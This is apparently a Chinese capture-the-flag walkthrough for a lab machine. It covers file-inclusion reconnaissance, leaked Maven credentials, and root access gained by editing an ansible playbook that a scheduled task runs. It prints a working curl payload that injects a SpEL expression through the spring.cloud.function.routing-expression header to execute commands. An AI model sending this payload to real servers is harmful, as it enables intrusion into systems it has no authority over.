信息收集

• 22
• 8080

8080端口如下。

主界面有一个上传图片的功能。

简单测试后发现对上传文件后缀名应该有过滤，只允许jpg后缀名文件上传。将一个内容为”test“的txt文件修改后缀为jpg后上传会出现错误。


验证一下是否存在LFI。

验证一下是否存在RFI，经过验证应该不存在RFI。

在maven的配置文件…/…/…/pom.xml里收集到一些项目和项目版本。

• spring-boot-starter-parent 2.6.5
• javax.activation 1.2.0
• spring-cloud-function-web 3.2.2
• bootstrap 5.1.3
• spring-boot-starter-thymeleaf
• spring-boot-starter-web

另外在frank目录下的.m2文件里面找到了phil的账号密码。

去看看用户目录里面是否有.ssh文件，虽然phil和frank目录下都有.ssh文件，但是应该是其他玩家留下的，ssh无法登录。

还记得上面收集的maven的项目文件内容么，一个一个去搜索看看是不是漏洞版本。

curl -i -s -k -X $‘POST’ -H $‘Host: 192.168.1.2:8080’ -H $‘spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“touch /tmp/test”)’ --data-binary $‘exploit_poc’ $‘http://192.168.1.2:8080/functionRouter’

注意exec执行的命令touch /tmp/test，记得去tmp看看有没有。

生成了mmiku文件。

准备脚本。

上传脚本。

开机

在/opt/发现了一些有趣的东西，一个yml的文件，初步怀疑有时间任务。

pspy验证了此想法。

root

接下来就是要弄一个ansible playbook代码来执行shell命令。
在官网看到这个模块ansible.builtin.command。

照着已有的yml文件修改一下即可。